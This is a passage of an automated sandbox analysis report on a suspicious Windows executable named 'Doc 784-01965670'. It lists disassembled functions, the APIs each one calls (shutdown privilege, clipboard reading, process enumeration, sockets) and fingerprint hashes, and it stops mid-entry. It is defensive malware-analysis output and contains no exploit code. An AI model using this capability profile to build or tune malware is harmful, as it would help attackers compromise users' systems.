                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3490752873-0
                                                                                                                                    • Opcode ID: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                                    • Instruction ID: 491154c1e478dcf6c9ac3cbca3c2c9e2645d4ee7bbdc2abf5fae4ada557f6fe4
                                                                                                                                    • Opcode Fuzzy Hash: b11fc48791dee11005ef1ac308328aec1e94b5ee495351b15ab77ecbbd68b2cc
                                                                                                                                    • Instruction Fuzzy Hash: 85519D71108301ABD610DF61CD84E6FB7E9AFC9B04F04491EFA869B242D778E909C76B
                                                                                                                                    Function 0047A999 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 288comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0047AA03
                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,?), ref: 0047AA27
                                                                                                                                    • CoCreateInstance.OLE32(?,00000000,00000005,004829C0,?), ref: 0047AAAA
                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0047AB6B
                                                                                                                                    • _memset.LIBCMT ref: 0047AB7C
                                                                                                                                    • _wcslen.LIBCMT ref: 0047AC68
                                                                                                                                    • _memset.LIBCMT ref: 0047ACCD
                                                                                                                                    • CoCreateInstanceEx.OLE32 ref: 0047AD06
                                                                                                                                    • CoSetProxyBlanket.OLE32(004829D0,?,?,?,?,?,?,00000800), ref: 0047AD53
                                                                                                                                    Strings
                                                                                                                                    • NULL Pointer assignment, xrefs: 0047AD84
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateInitializeInstance_memset$BlanketFromProgProxySecurity_wcslen
                                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                                    • API String ID: 1588287285-2785691316
                                                                                                                                    • Opcode ID: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                                    • Instruction ID: 16786b45dbc5194aa398acfc0f0ff3b91b98a178c64a073a91da7f4e0cb75f58
                                                                                                                                    • Opcode Fuzzy Hash: 40e9c8eb680feb4042e694522f3113d29542bf103086fe34e1494599e09369de
                                                                                                                                    • Instruction Fuzzy Hash: 54B10DB15083409FD320EF65C881B9FB7E8BBC8744F108E2EF58997291D7759948CB66
                                                                                                                                    Function 004364AA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 79shutdownCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004364B9
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004364C0
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004364D6
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 004364FE
                                                                                                                                    • GetLastError.KERNEL32 ref: 00436504
                                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00436527
                                                                                                                                    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000001), ref: 00436557
                                                                                                                                    • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 0043656A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                    • API String ID: 2938487562-3733053543
                                                                                                                                    • Opcode ID: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                                    • Instruction ID: b625d7910520021a286729d09db348b3c4b0b131b75d5259d4bd29649b467962
                                                                                                                                    • Opcode Fuzzy Hash: 9f228ad1da6a4c81f8cb5394189ecc1147849337ed66d96e43b1ced3868a671c
                                                                                                                                    • Instruction Fuzzy Hash: E021D5B02803017FF7149B64DD4AF6B3398EB48B10F948829FE09852D2D6BDE844973D
                                                                                                                                    Function 0043614F Relevance: 16.6, APIs: 11, Instructions: 103COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __swprintf.LIBCMT ref: 00436162
                                                                                                                                    • __swprintf.LIBCMT ref: 00436176
                                                                                                                                      • Part of subcall function 0041353A: __woutput_l.LIBCMT ref: 0041358F
                                                                                                                                    • __wcsicoll.LIBCMT ref: 00436185
                                                                                                                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 004361A6
                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004361AE
                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 004361B5
                                                                                                                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 004361DA
                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004361E4
                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004361F0
                                                                                                                                    • LockResource.KERNEL32(?), ref: 004361FD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll__woutput_l
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2406429042-0
                                                                                                                                    • Opcode ID: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                                    • Instruction ID: 79d88324f8a28cdfdddc37bd7103cac5134eefaeeaedb246b69d205017f9fa0d
                                                                                                                                    • Opcode Fuzzy Hash: c1b2c305ea449a9eaa2c50be24a6d356ee30b865a6e7eb3c9e4c44cc17d92184
                                                                                                                                    • Instruction Fuzzy Hash: 82313432104210BFD700EF64ED88EAF77A9FB89304F00882BFA4196150E778D940CB68
                                                                                                                                    Function 0045D517 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 91COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D522
                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D593
                                                                                                                                    • GetLastError.KERNEL32 ref: 0045D59D
                                                                                                                                    • SetErrorMode.KERNEL32(?), ref: 0045D629
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                    • API String ID: 4194297153-14809454
                                                                                                                                    • Opcode ID: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                                    • Instruction ID: 49a1caac5541b587bc648ef7caa6256b54369420b38b3993b587487a6931f65b
                                                                                                                                    • Opcode Fuzzy Hash: 49e0e17e9479d30b414134c7f78092e00673ae1a45d158f41d80208550ba4cb8
                                                                                                                                    • Instruction Fuzzy Hash: BA31AD75A083009FC310EF55D98090BB7E1AF89315F448D6FF94997362D778E9068B6A
                                                                                                                                    Function 0047AD92 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 251comCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • MkParseDisplayName.OLE32(?,00000000,?,?), ref: 0047AF0F
                                                                                                                                      • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                                                                      • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0047AE06
                                                                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                    • _wcslen.LIBCMT ref: 0047AE18
                                                                                                                                    • CreateBindCtx.OLE32(00000000,?), ref: 0047AEC2
                                                                                                                                    • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0047AFCC
                                                                                                                                    • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0047AFF9
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CopyVariant$_wcslen$ActiveBindCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcscpy
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 1915432386-2761332787
                                                                                                                                    • Opcode ID: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                                    • Instruction ID: 7e3b4e38c6064d991530b19baaff212313fd3e9d55f264e0ba959e8ba912c45c
                                                                                                                                    • Opcode Fuzzy Hash: e5cc958d5f324366fbee3d2ecbe33304f19c15b46d8e68c756c5eb73bbadfcb0
                                                                                                                                    • Instruction Fuzzy Hash: 6C915C71604301ABD710EB65CC85F9BB3E8AFC8714F10892EF64597291EB78E909CB5A
                                                                                                                                    Function 0044ED9A Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 448COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: DEFINE$`$h$h
                                                                                                                                    • API String ID: 0-4194577831
                                                                                                                                    • Opcode ID: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                                    • Instruction ID: b1cbab3e2140d6a963e4b85c5b61650905c2e88cbb7a9c7ccaf19de07e543520
                                                                                                                                    • Opcode Fuzzy Hash: 924177e0c3576f85a96b78a37b3c3cedf46843da4e7c3acb3e3d7f55582469aa
                                                                                                                                    • Instruction Fuzzy Hash: 9802A1715083818FE725CF29C88076BBBE2BFD5304F28896EE89587342D779D849CB56
                                                                                                                                    Function 0046483C Relevance: 10.6, APIs: 7, Instructions: 103networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • socket.WSOCK32(00000002,00000001,00000006), ref: 004648B0
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,?,00000000), ref: 004648BE
                                                                                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 004648DA
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,00000000,?,00000010,00000002,00000001,00000006,?,00000000), ref: 004648E6
                                                                                                                                    • closesocket.WSOCK32(00000000), ref: 0046492D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$bindclosesocketsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2609815416-0
                                                                                                                                    • Opcode ID: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                                    • Instruction ID: d240999dee57073d64b91b26c15bb406cb7727aead8f71c00845428af50f987f
                                                                                                                                    • Opcode Fuzzy Hash: f055706b1daf61e2065e9fedb91be4565bf8eae27f8502184711caae908a2a6c
                                                                                                                                    • Instruction Fuzzy Hash: C731CB712002009BD710FF2ADC81B6BB3E8EF85724F144A5FF594A72D2D779AC85876A
                                                                                                                                    Function 0043701F Relevance: 10.6, APIs: 7, Instructions: 76processCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00437043
                                                                                                                                    • Process32FirstW.KERNEL32(00000000,00000002), ref: 00437050
                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00437075
                                                                                                                                    • __wsplitpath.LIBCMT ref: 004370A5
                                                                                                                                      • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                    • _wcscat.LIBCMT ref: 004370BA
                                                                                                                                    • __wcsicoll.LIBCMT ref: 004370C8
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?), ref: 00437105
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2547909840-0
                                                                                                                                    • Opcode ID: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                                    • Instruction ID: d866d71778569fbbd99b025f777f77cc3db9ba9c83dfb601fa45888e96c7797d
                                                                                                                                    • Opcode Fuzzy Hash: fd838752e9d0606085fad0ec29118efadb7b5f17250a81beb0a2f2c9513d2e10
                                                                                                                                    • Instruction Fuzzy Hash: 9C21A7B20083819BD735DB55C881BEFB7E8BB99304F00491EF5C947241EB79A589CB6A
                                                                                                                                    Function 00452126 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 127filesleepCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,00000000), ref: 0045217E
                                                                                                                                    • Sleep.KERNEL32(0000000A,?,?,00000000), ref: 004521B2
                                                                                                                                    • FindNextFileW.KERNEL32(?,?,?,00000000), ref: 004522AC
                                                                                                                                    • FindClose.KERNEL32(?,?,00000000), ref: 004522C3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$CloseFirstNextSleep_wcslen
                                                                                                                                    • String ID: *.*
                                                                                                                                    • API String ID: 2693929171-438819550
                                                                                                                                    • Opcode ID: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                                    • Instruction ID: e6452ff64139cddd5fd774ab19bf2199aa97b2a19dc0f7115334900b47d689b2
                                                                                                                                    • Opcode Fuzzy Hash: 17936c38af85c1dbfc3d1ebbd0b26446ca2a596e07a4ad84d79ac0689e190811
                                                                                                                                    • Instruction Fuzzy Hash: BD419D756083409FC314DF25C984A9FB7E4BF86305F04491FF98993291DBB8E949CB5A
                                                                                                                                    Function 0046C5D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69clipboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                                    • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                                    • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                                    • CloseClipboard.USER32 ref: 0046C692
                                                                                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                                    • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                                    • CloseClipboard.USER32 ref: 0046C866
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 589737431-2761332787
                                                                                                                                    • Opcode ID: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                                    • Instruction ID: 5556deb4c8197336e1b92b5e2a85e957832ef7964462d916cb468ff193882e13
                                                                                                                                    • Opcode Fuzzy Hash: 76419e0badb028214ed7bad9e924c36871e80023f9f647d131bfc03e45e064d3
                                                                                                                                    • Instruction Fuzzy Hash: 7301F5762042005FC300AFB9ED45B6A7BA4EF59704F04097FF980A72C1EBB1E915C7AA
                                                                                                                                    Function 00436431 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • __wcsicoll.LIBCMT ref: 0043643C
                                                                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 00436452
                                                                                                                                    • __wcsicoll.LIBCMT ref: 00436466
                                                                                                                                    • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043647C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsicollmouse_event
                                                                                                                                    • String ID: DOWN
                                                                                                                                    • API String ID: 1033544147-711622031
                                                                                                                                    • Opcode ID: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                                    • Instruction ID: 8a73d33e481528181e274ae5662561dddcd8f7088196b39fde8242b6fe69d79f
                                                                                                                                    • Opcode Fuzzy Hash: 8e71a22f1bb6dc727f393f419cee3c46fab46d9365d91d475c80ba63e0095046
                                                                                                                                    • Instruction Fuzzy Hash: 75E0927558872039FC4036253C02FFB174CAB66796F018116FE00D1291EA586D865BBD
                                                                                                                                    Function 004741BB Relevance: 7.6, APIs: 5, Instructions: 137networkCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 00474213
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00474233
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLastinet_addrsocket
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4170576061-0
                                                                                                                                    • Opcode ID: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                                    • Instruction ID: 44a7e99483396e6262e636993c5e510db402c36a24f0b6146f21617b09e75fab
                                                                                                                                    • Opcode Fuzzy Hash: c11ce247c64ee683b380b6a697379cd3ea863651eb179087c325b129d43524e0
                                                                                                                                    • Instruction Fuzzy Hash: B6412C7164030067E720BB3A8C83F5A72D89F40728F144D5EF954BB2C3D6BAAD45475D
                                                                                                                                    Function 00456354 Relevance: 7.6, APIs: 5, Instructions: 127keyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
